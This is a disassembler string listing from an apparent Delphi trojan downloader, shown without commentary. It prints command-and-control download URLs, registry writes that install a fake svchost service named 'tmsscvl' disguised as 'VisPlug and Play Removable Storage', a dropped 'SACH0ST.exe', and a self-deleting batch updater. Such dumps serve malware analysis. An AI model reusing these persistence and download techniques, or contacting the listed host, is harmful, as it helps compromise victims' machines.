- 008F2B90 DD 复件_EVE.008F2BEE ASCII 0C,"TDownSrvFile"
- 008F2BEF ASCII "TDownSrvFile"
- 008F2C51 MOV EDX,复件_EVE.008F2CD4 ASCII ".bat"
- 008F2C56 MOV EAX,复件_EVE.008F2CE4 ASCII "nb"
- 008F2CD4 ASCII ".bat",0
- 008F2CE4 ASCII "nb",0
- 008F2CF0 ASCII "^",0
- 008F2DC7 MOV ECX,复件_EVE.008F2ED4 ASCII "downurl"
- 008F2DCC MOV EDX,复件_EVE.008F2EE4 ASCII "URLList"
- 008F2E19 MOV EDX,复件_EVE.008F2EF4 ASCII ".txt"
- 008F2ED4 ASCII "downurl",0
- 008F2EE4 ASCII "URLList",0
- 008F2EF4 ASCII ".txt",0
- 008F3068 DD 复件_EVE.008F309C ASCII 0B,"TPlayboyThd"
- 008F309D ASCII "TPlayboyThd"
- 008F30C8 MOV ECX,复件_EVE.008F3108 ASCII "http://upcfg.netdiu.cn/setupurl.txt"
- 008F3108 ASCII "http://upcfg.net"
- 008F3118 ASCII "diu.cn/setupurl."
- 008F3128 ASCII "txt",0
- 008F3185 MOV EDX,复件_EVE.008F3340 ASCII ".exe"
- 008F31A4 MOV ECX,复件_EVE.008F3350 ASCII "eventrep.dll"
- 008F31E2 MOV ECX,复件_EVE.008F3368 ASCII "wbem\SACH0ST.exe"
- 008F3274 MOV EAX,复件_EVE.008F3350 ASCII "eventrep.dll"
- 008F3285 MOV EAX,复件_EVE.008F3350 ASCII "eventrep.dll"
- 008F3295 MOV EAX,复件_EVE.008F3350 ASCII "eventrep.dll"
- 008F32A3 PUSH 复件_EVE.008F337C ASCII "TVisfrmMain"
- 008F3340 ASCII ".exe",0
- 008F3350 ASCII "eventrep.dll",0
- 008F3368 ASCII "wbem\SACH0ST.exe"
- 008F3378 ASCII 0
- 008F337C ASCII "TVisfrmMain",0
- 008F33CF MOV EDX,复件_EVE.008F3410 ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
- 008F3410 ASCII "SOFTWARE\Microso"
- 008F3420 ASCII "ft\Windows NT\Cu"
- 008F3430 ASCII "rrentVersion\Svc"
- 008F3440 ASCII "host",0
- 008F3463 MOV EDX,复件_EVE.008F34A8 ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
- 008F3470 MOV ECX,复件_EVE.008F34E8 ASCII "tmsscvl"
- 008F34A8 ASCII "SOFTWARE\Microso"
- 008F34B8 ASCII "ft\Windows NT\Cu"
- 008F34C8 ASCII "rrentVersion\Svc"
- 008F34D8 ASCII "host",0
- 008F34E8 ASCII "tmsscvl",0
- 008F3519 MOV EDX,复件_EVE.008F3604 ASCII "SYSTEM\ControlSet001\Services\tmsscvl\Start"
- 008F352D MOV EDX,复件_EVE.008F3638 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\Type"
- 008F3541 MOV EDX,复件_EVE.008F3670 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\ErrorControl"
- 008F3550 MOV ECX,复件_EVE.008F36B0 ASCII "VisPlug and Play Removable Storage"
- 008F3555 MOV EDX,复件_EVE.008F36DC ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\DisplayName"
- 008F3564 MOV ECX,复件_EVE.008F371C ASCII "%SystemRoot%\System32\svchost.exe -k tmsscvl"
- 008F3569 MOV EDX,复件_EVE.008F3754 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\ImagePath"
- 008F357D MOV EDX,复件_EVE.008F3804 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\Description"
- 008F358C MOV ECX,复件_EVE.008F3844 ASCII "LocalSystem"
- 008F3591 MOV EDX,复件_EVE.008F3858 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\ObjectName"
- 008F35AB MOV EDX,复件_EVE.008F3898 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\Parameters\ServiceDll"
- 008F35BA MOV EAX,复件_EVE.008F38E0 ASCII "tmsscvl"
- 008F3604 ASCII "SYSTEM\ControlSe"
- 008F3614 ASCII "t001\Services\tm"
- 008F3624 ASCII "sscvl\Start",0
- 008F3638 ASCII "SYSTEM\CurrentCo"
- 008F3648 ASCII "ntrolSet\Service"
- 008F3658 ASCII "s\tmsscvl\Type",0
- 008F3670 ASCII "SYSTEM\CurrentCo"
- 008F3680 ASCII "ntrolSet\Service"
- 008F3690 ASCII "s\tmsscvl\ErrorC"
- 008F36A0 ASCII "ontrol",0
- 008F36B0 ASCII "VisPlug and Play"
- 008F36C0 ASCII " Removable Stora"
- 008F36D0 ASCII "ge",0
- 008F36DC ASCII "SYSTEM\CurrentCo"
- 008F36EC ASCII "ntrolSet\Service"
- 008F36FC ASCII "s\tmsscvl\Displa"
- 008F370C ASCII "yName",0
- 008F371C ASCII "%SystemRoot%\Sys"
- 008F372C ASCII "tem32\svchost.ex"
- 008F373C ASCII "e -k tmsscvl",0
- 008F3754 ASCII "SYSTEM\CurrentCo"
- 008F3764 ASCII "ntrolSet\Service"
- 008F3774 ASCII "s\tmsscvl\ImageP"
- 008F3784 ASCII "ath",0
- 008F3804 ASCII "SYSTEM\CurrentCo"
- 008F3814 ASCII "ntrolSet\Service"
- 008F3824 ASCII "s\tmsscvl\Descri"
- 008F3834 ASCII "ption",0
- 008F3844 ASCII "LocalSystem",0
- 008F3858 ASCII "SYSTEM\CurrentCo"
- 008F3868 ASCII "ntrolSet\Service"
- 008F3878 ASCII "s\tmsscvl\Object"
- 008F3888 ASCII "Name",0
- 008F3898 ASCII "SYSTEM\CurrentCo"
- 008F38A8 ASCII "ntrolSet\Service"
- 008F38B8 ASCII "s\tmsscvl\Parame"
- 008F38C8 ASCII "ters\ServiceDll",0
- 008F38E0 ASCII "tmsscvl",0
- 008F39E6 MOV ECX,复件_EVE.008F3B90 ASCII "eventrep.dll"
- 008F39F5 MOV ECX,复件_EVE.008F3B90 ASCII "eventrep.dll"
- 008F3A04 MOV EDX,复件_EVE.008F3BA8 ASCII ".bat"
- 008F3A09 MOV EAX,复件_EVE.008F3BB8 ASCII "sm"
- 008F3A51 MOV EDX,复件_EVE.008F3BC4 ASCII "@echo off"
- 008F3A5E MOV EDX,复件_EVE.008F3BD8 ASCII ":loop"
- 008F3A6B MOV EDX,复件_EVE.008F3BE8 ASCII "net stop tmsscvl"
- 008F3A7E MOV EDX,复件_EVE.008F3C04 ASCII "del "
- 008F3A93 PUSH 复件_EVE.008F3C14 ASCII "if exist ""
- 008F3A9B PUSH 复件_EVE.008F3C28 ASCII "" goto loop"
- 008F3AB8 PUSH 复件_EVE.008F3C3C ASCII "copy "
- 008F3AE6 MOV EDX,复件_EVE.008F3C04 ASCII "del "
- 008F3AFB MOV EDX,复件_EVE.008F3C58 ASCII "net start tmsscvl"
- 008F3B08 MOV EDX,复件_EVE.008F3C74 ASCII "del %0"
- 008F3B90 ASCII "eventrep.dll",0
- 008F3BA8 ASCII ".bat",0
- 008F3BB8 ASCII "sm",0
- 008F3BC4 ASCII "@echo off",0
- 008F3BD8 ASCII ":loop",0
- 008F3BE8 ASCII "net stop tmsscvl"
- 008F3BF8 ASCII 0
- 008F3C04 ASCII "del ",0
- 008F3C14 ASCII "if exist "",0
- 008F3C28 ASCII "" goto loop",0
- 008F3C3C ASCII "copy ",0
- 008F3C4C ASCII " ",0
- 008F3C58 ASCII "net start tmsscv"
- 008F3C68 ASCII "l",0
- 008F3C74 ASCII "del %0",0
- 008F3C97 MOV EAX,复件_EVE.008F3D90 ASCII "tmsscvl"
- 008F3CDA PUSH 复件_EVE.008F3D98 ASCII "%SystemRoot%\System32\svchost.exe -k tmsscvl"
- 008F3CEA PUSH 复件_EVE.008F3DC8 ASCII "VisPlug and Play Removable Storage"
- 008F3CEF PUSH 复件_EVE.008F3DEC ASCII "tmsscvl"
- 008F3D34 MOV EDX,复件_EVE.008F3E70 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\Description"
- 008F3D4E MOV EDX,复件_EVE.008F3EB0 ASCII "SYSTEM\CurrentControlSet\Services\tmsscvl\Parameters\ServiceDll"
- 008F3D90 ASCII "tmsscvl",0
- 008F3D98 ASCII "%SystemRoot%\Sys"
- 008F3DA8 ASCII "tem32\svchost.ex"
- 008F3DB8 ASCII "e -k tmsscvl",0
- 008F3DC8 ASCII "VisPlug and Play"
- 008F3DD8 ASCII " Removable Stora"
- 008F3DE8 ASCII "ge",0
- 008F3DEC ASCII "tmsscvl",0
- 008F3E70 ASCII "SYSTEM\CurrentCo"
- 008F3E80 ASCII "ntrolSet\Service"
- 008F3E90 ASCII "s\tmsscvl\Descri"
- 008F3EA0 ASCII "ption",0
- 008F3EB0 ASCII "SYSTEM\CurrentCo"
- 008F3EC0 ASCII "ntrolSet\Service"
- 008F3ED0 ASCII "s\tmsscvl\Parame"
- 008F3EE0 ASCII "ters\ServiceDll",0
- 008F3F24 MOV EAX,复件_EVE.008F4018 ASCII "tmsscvl"
- 008F3F5E PUSH 10000 UNICODE "=::=::"
- 008F3F63 PUSH 复件_EVE.008F4020 ASCII "tmsscvl"
- 008F4018 ASCII "tmsscvl",0
- 008F4020 ASCII "tmsscvl",0
- 008F4073 PUSH 复件_EVE.008F443C ASCII "tmsscvl"
- 008F40A6 MOV EDX,复件_EVE.008F444C ASCII "Error Code: "
- 008F417B MOV EAX,复件_EVE.008F4468 ASCII "http://upcfg.netdiu.cn/viscp%d.txt"
- 008F4227 MOV EDX,复件_EVE.008F4494 ASCII ".tmp"
- 008F422C MOV EAX,复件_EVE.008F44A4 ASCII "ms"
- 008F4271 MOV EAX,复件_EVE.008F4468 ASCII "http://upcfg.netdiu.cn/viscp%d.txt"
- 008F42CC MOV EAX,复件_EVE.008F4468 ASCII "http://upcfg.netdiu.cn/viscp%d.txt"
- 008F42FE MOV ECX,复件_EVE.008F44B0 ASCII "eventrep.dll"
- 008F443C ASCII "tmsscvl",0
- 008F444C ASCII "Error Code: ",0
- 008F4468 ASCII "http://upcfg.net"
- 008F4478 ASCII "diu.cn/viscp%d.t"
- 008F4488 ASCII "xt",0
- 008F4494 ASCII ".tmp",0
- 008F44A4 ASCII "ms",0
- 008F44B0 ASCII "eventrep.dll",0
- 008F44D9 MOV EAX,复件_EVE.008F4510 ASCII "tmsscvl"
- 008F4510 ASCII "tmsscvl",0
- 008F4750 MOV EDX,复件_EVE.008F477C ASCII "fdsaf"
- 008F4763 MOV EDX,复件_EVE.008F478C ASCII "afqfdsafdsaw"
- 008F477C ASCII "fdsaf",0
- 008F478C ASCII "afqfdsafdsaw",0
- 008F60E8 MOV EDX,复件_EVE.008F6130 ASCII "0x"
- 008F6130 ASCII "0x",0
- 008F648F PUSH 复件_EVE.008F64A0 ASCII "TaskbarCreated"
- 008F64A0 ASCII "TaskbarCreated",0
- 008F64F9 PUSH 复件_EVE.008F6524 ASCII "Delphi Picture"
- 008F6509 PUSH 复件_EVE.008F6534 ASCII "Delphi Component"
- 008F6524 ASCII "Delphi Picture",0
- 008F6534 ASCII "Delphi Component"
- 008F6544 ASCII 0
- 008F66CD PUSH 复件_EVE.008F6704 ASCII "TaskbarCreated"
复制代码 |